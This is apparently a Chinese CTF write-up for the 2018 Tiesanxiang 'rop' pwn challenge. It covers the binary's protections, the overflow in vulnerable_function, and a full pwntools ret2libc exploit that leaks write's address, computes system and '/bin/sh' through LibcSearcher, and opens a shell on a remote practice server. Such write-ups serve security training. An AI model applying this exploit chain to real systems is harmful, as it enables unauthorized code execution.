铁人三项(第五赛区)_2018_rop
ubuntu18
0x01
checksec
1 2 3 4 5 6 [*] '/home/zelas/Desktop/pwn/铁人三项(第五赛区)_2018_rop/2018_rop' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled \\栈不可执行 PIE: No PIE (0x8048000)
IDA
main()
1 2 3 4 5 6 int __cdecl main (int argc, const char **argv, const char **envp) { be_nice_to_people(); vulnerable_function(); return write(1 , "Hello, World\n" , 0xD u); }
vulnerable_function()
1 2 3 4 5 6 ssize_t vulnerable_function () { char buf[136 ]; return read(0 , buf, 0x100 u); }
0x02
思路 ret2libc
利用read()溢出泄露write()真实地址
利用Libcsearcher计算出system()和bin_sh
再次执行main()函数,执行system()
s
0x88H
ebp
0x4
ret
write()
write_ret
main()
arg[0]
0
arg[1]
write_got
arg[2]
0x4
s
0x88
ebp
0x4
ret
system()
sys_ret
0xdeadbeef
arg
bin_sh
0x03
libc6-i386_2.27-3ubuntu1_amd64
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 from pwn import *from LibcSearcher import *context(os='linux' , arch='i386' , log_level='debug' ) io = remote('node4.buuoj.cn' , 29018 ) elf = ELF('./2018_rop' ) padding = 0x88 + 0x4 write_got = elf.got['write' ] write_plt = elf.plt['write' ] main_addr = elf.symbols['main' ] payload = b'a' * padding + p32(write_plt) + p32(main_addr) + p32(0 ) + p32(write_got) + p32(0x4 ) io.sendline(payload) write_addr = u32(io.recv(4 )) print ('[+] write_addr' , hex (write_addr))libc = LibcSearcher('write' , write_addr) libc_base = write_addr - libc.dump('write' ) system = libc_base + libc.dump('system' ) bin_sh = libc_base + libc.dump('str_bin_sh' ) ret = 0x08048199 payload1 = b'a' * padding + p32(ret) + p32(system) + p32(0xdeadbeef ) + p32(bin_sh) io.sendline(payload1) io.interactive()
